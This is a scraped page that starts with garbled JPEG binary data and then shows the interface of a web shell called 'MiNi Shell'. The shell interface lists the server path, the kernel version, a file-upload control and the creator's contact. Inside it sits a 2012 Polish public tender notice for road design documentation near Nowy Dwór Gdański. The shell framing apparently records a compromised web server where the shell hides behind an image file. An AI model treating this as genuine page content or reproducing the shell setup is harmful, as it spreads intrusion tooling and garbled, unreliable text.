JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121119/458174-N-2012.html

<p class="kh_header"><b>Nowy Dwór Gdański: Na opracowanie dokumentacji projektowo - kosztorysowej
przebudowy drogi powiatowej Nr 2345G  na odcinku Jazowa - Rakowo w km od 4+627 do km 7+227 oraz remont drogi powiatowej  Nr 2301G na odcinku Solnica - Rakowiska w km 3+990 do km 5+490</b><br>
<b>Numer ogłoszenia: 458174 - 2012; data zamieszczenia: 19.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Morska 1, 82-100 Nowy Dwór Gdański, woj. pomorskie, tel. 055 2472235, faks 055 2472235.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Na opracowanie dokumentacji projektowo - kosztorysowej
przebudowy drogi powiatowej Nr 2345G  na odcinku Jazowa - Rakowo w km od 4+627 do km 7+227 oraz remont drogi powiatowej  Nr 2301G na odcinku Solnica - Rakowiska w km 3+990 do km 5+490.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.   Przedmiotem Zamówienia jest opracowanie dokumentacji projektowo - kosztorysowej     dla zadania pn.: Opracowanie dokumentacji projektowo - kosztorysowej  przebudowy  drogi powiatowej Nr 2345G  na odcinku Jazowa - Rakowo w km od 4+627 do km 7+227 oraz remont drogi  powiatowej  Nr 2301G na odcinku Solnica - Rakowiska w km 3+990 do km 5+490 obejmującej:
projekty  budowlane - branża drogowa, 
projekty budowlane - branża wodociągowa, energetyczna, teletechniczna( jeżeli będzie wymagany)
projekty  wykonawcze - branża drogowa, 
projekty wykonawcze - branża wodociągowa, energetyczna, teletechniczna ( jeżeli będzie wymagany)
plan zagospodarowania terenu ,( 3 egzemplarze)
plan wyrębu drzew (jeśli jest konieczny 3 egzemplarze ),
docelowy projekt organizacji ruchu ( oznakowanie poziome i pionowe 5 egzemplarzy),
wykonanie operatu oddziaływania na środowisko ( jeśli będzie wymagany ),
specyfikacje techniczne wykonania i odbioru robót (sporządzone jako odrębny dokument wszystkie branże),
przedmiary robót,
kosztorysy inwestorskie,
kosztorysy ofertowe,
badania, pomiary, opinie, ekspertyzy,
wykonanie i opracowanie  badań geologicznych  wraz z inwentaryzacją  istniejącej nawierzchni z odwiertami min. co 250 m.  (badania geotechniczno - inżynierskie),
wykonanie mapy do celów projektowych w wersji elektronicznej i papierowej,
operat wodno - prawny (jeśli będzie wymagany),
informacja dotycząca bezpieczeństwa i ochrony zdrowia oddzielnie dla wszystkich branż,
uzyskanie wszelkich innych wymaganych uzgodnień i decyzji w tym decyzji środowiskowej zgodnie z wymaganiami szczegółowymi, w tym z właściwym ZUDP.
uzyskanie pozwolenia na budowę

1.1.	Projekt powinien być sporządzony w  następującej ilości papierowych  egzemplarzy:
a.  projekty budowlane (wszystkie branże)  - 5 kompletów, 
b.  projekty wykonawcze (wszystkie branże)   - 5 kompletów,
c.  specyfikacje techniczne (wszystkie branże)  - 3 komplety,
d.  przedmiary i kosztorysy - 3 komplety.

Oprócz wersji papierowej cały komplet dokumentacji   należy  wykonać w wersji elektronicznej na płycie CD, z możliwością kopiowania dla potrzeb przetargowych
( Word)  oraz w formacie  PDF, DWG- 1 egzemplarz.

1.2.	Wykonawca zapewni na swój koszt pozyskanie niezbędnych wyjściowych materiałów do projektowania  takich jak: inwentaryzacje, mapy, wypisy, wyrysy, ekspertyzy, badania geotechniczne, inwentaryzacje.
1.3.	 Wykonawca na swój koszt  przygotuje  kompletne wnioski  o wydanie  decyzji o zatwierdzeniu  projektu  budowlanego i pozwolenia na budowę i po podpisaniu przez Zamawiającego złoży je  do właściwych organów.
1.4.	Wykonawca dokona  wszelkich niezbędnych uzgodnień oraz uzyska decyzje wymagane  do  otrzymania pozwolenia na budowę, oraz zapewni  w cenie opracowania pełnienie nadzoru autorskiego w trakcie trwania prac budowlanych w oparciu  o dokumentację projektową  której opracowanie  stanowi  przedmiot zamówienia. Zamawiający nie przewiduje podpisania odrębnej umowy na  prowadzenie nadzoru autorskiego. Wykonawca dokona aktualizacji kosztorysu inwestorskiego. 
1.5.	Projekty remontu i przebudowy  dróg realizowane będą na terenie Powiatu Nowodworskiego w ciągu dróg powiatowych które znajdują się w  użytkowaniu  Zarządu Dróg Powiatowych w Nowym Dworze Gdańskim. 

Poniżej przedstawiono charakterystykę  dróg  objętych  przedmiotem zamówienia:
Droga powiatowa Nr 2345G na odcinku Jazowa - Kępki w km od   4+627 do km 7+227.Planowana przebudowa na odcinku o długości 2600 mb zakłada wykonanie projektu konstrukcji  nawierzchni na ruch kategorii KR-2, poszerzenia jezdni, uzupełnienie poboczy i wykonanie zjazdów. Ewentualna przebudowa przepustów
( poszerzenie ich).

droga  powiatowa  Nr 2301G na odcinku Solnica - Rakowiska w km 3+990 do km 5+490.  Planowany remont na odcinku  o długości 1,5 km  zakłada  wzmocnienie istniejącej nawierzchni drogi masami bitumicznymi, uzupełnienie poboczy i wykonanie zjazdów. 
1.6.	Dokumentacja projektowa winna  być sporządzona  w oparciu o wymogi określone w:
Ustawie z dnia 07 lipca 1994 r. Prawo Budowlane (t.j. Dz.U. z 2006 r.  Nr 156, poz. 1118 ze zm.)
Ustawie z dnia 21 marca 1985 r. o drogach publicznych (t.j. Dz.U. z 2007 r. Nr 19, poz. 115 ze zm.),
Rozporządzeniu Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno- użytkowego (Dz.U. Nr 202, poz. 2072 ze zm.),
Rozporządzeniu Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz. 1133 ze zm.),
Ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (T.j. z 2008r. Dz. U. Nr 193, poz. 1194 ze zm.),
Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod  i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz.U. Nr 130, poz. 1389),
Rozporządzeniu Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. Nr 43, poz. 430),
Rozporządzeniu Ministra Infrastruktury z dnia 03.07.2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. Nr 220, poz. 2181 ze zm.),
Ustawie z dnia 10.04.2003 r. o szczegółowych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.
Ustawie Prawo ochrony środowiska z dnia 18 maja 2005 r. o zmianie ustawy - Prawo ochrony środowiska oraz niektórych innych ustaw (Dz. U. Nr 113, poz. 954).
Innych obowiązujących przepisach i normatywach.
1.7.	Zamawiający wymaga aby oferta obejmowała całość przedmiotu zamówienia. Nie dopuszcza się składania ofert częściowych.
1.8.	 Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego. Ewentualne zamówienie  uzupełniające zostanie udzielone w trybie przewidzianym w art.67 ust.1 pkt 6) Prawa zamówień publicznych.
1.9.	Wymaga się, aby Wykonawcy dokonali wizji lokalnej na terenie realizacji projektu i w jego okolicy w celu dokonania oceny przedmiotu zamówienia i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego.
1.10.	W przypadku stwierdzenia błędów w dokumentacji projektowej  Wykonawca jest zobowiązany do ich niezwłocznego usunięcia na własny koszt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego. Ewentualne zamówienie  uzupełniające zostanie udzielone w trybie przewidzianym w art.67 ust.1 pkt 6) Prawa zamówień publicznych</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.23.22.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie Dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadać  minimum 3 - letnie doświadczenie w wykonywaniu usług projektowych.
Posiadać uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonali, w okresie  ostatnich 3 latach przed dniem wszczęcia postępowania o udzielenie zamówienia, co najmniej 1 zamówienie , odpowiadające swoim rodzajem przedmiotowi zamówienia. tj.  wykonali  przynajmniej  jedną dokumentację projektową  przebudowy lub remontu drogi co najmniej klasy Z o długości  min 1,5 km.  Wykonawca zobowiązany jest dołączyć dokument potwierdzający, że robota została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiada niezbędną wiedzę i doświadczenie  oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. Zamawiający wymaga aby wykonawca przedstawił do realizacji zamówienia następujące osoby</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajduje się w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie zamówienia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144, ust. 1, Ustawy Zamawiający dla zapewnienia                                      prawidłowej realizacji zadania, dopuszcza możliwość istotnych zmian      postanowień zawartych w umowie. W szczególności  zmiany mogą dotyczyć przedmiotu zamówienia, terminu wykonania umowy, ustalonego wynagrodzenia,  w sytuacji gdy:
          a. zaszły okoliczności, których nie można było przewidzieć w chwili
  zawarcia umowy,
         b. zaszły zmiany przepisów prawnych, w tym zmiany stawki podatku VAT,
         c. zaistnieje zdarzenie niezależne od stron umowy lub w przypadku
    działania siły wyższej, powodującej konieczność wprowadzenia
     zmian do umowy, w tym termin   wykonania. W takim przypadku
    przesunięcie terminu może nastąpić o okres w jakim wykonywanie
 przedmiotu umowy było niemożliwe ze względu na działanie siły
 wyższej. Wykonawca jest zobowiązany niezwłocznie poinformować
 Zamawiającego o fakcie zaistnienia siły wyższej,
       d. zlecenia przez Zamawiającego robót dodatkowych lub zamiennych
    od których wykonania uzależnione jest wykonanie zamówienia
     podstawowego, jeżeli terminy ich zlecenia, rodzaj lub zakres
     uniemożliwiają dotrzymanie pierwotnego terminu zakończenia
     realizacji umowy. W takim przypadku termin wykonania zamówienia
    podstawowego może być przesunięty o czas niezbędny na zlecenie i
    wykonanie zamówienia dodatkowego lub zamiennego,
       e. prace objęte umową zostały wstrzymane przez właściwe organy, co
    uniemożliwia terminowe zakończenie realizacji przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.zdpndg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Nowym Dworze Gdańskim, ul. Morska 1, 82-100 Nowy Dwór Gdański.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2012 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Nowym Dworze Gdańskim, ul. Morska 1, 82-100 Nowy Dwór Gdański.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com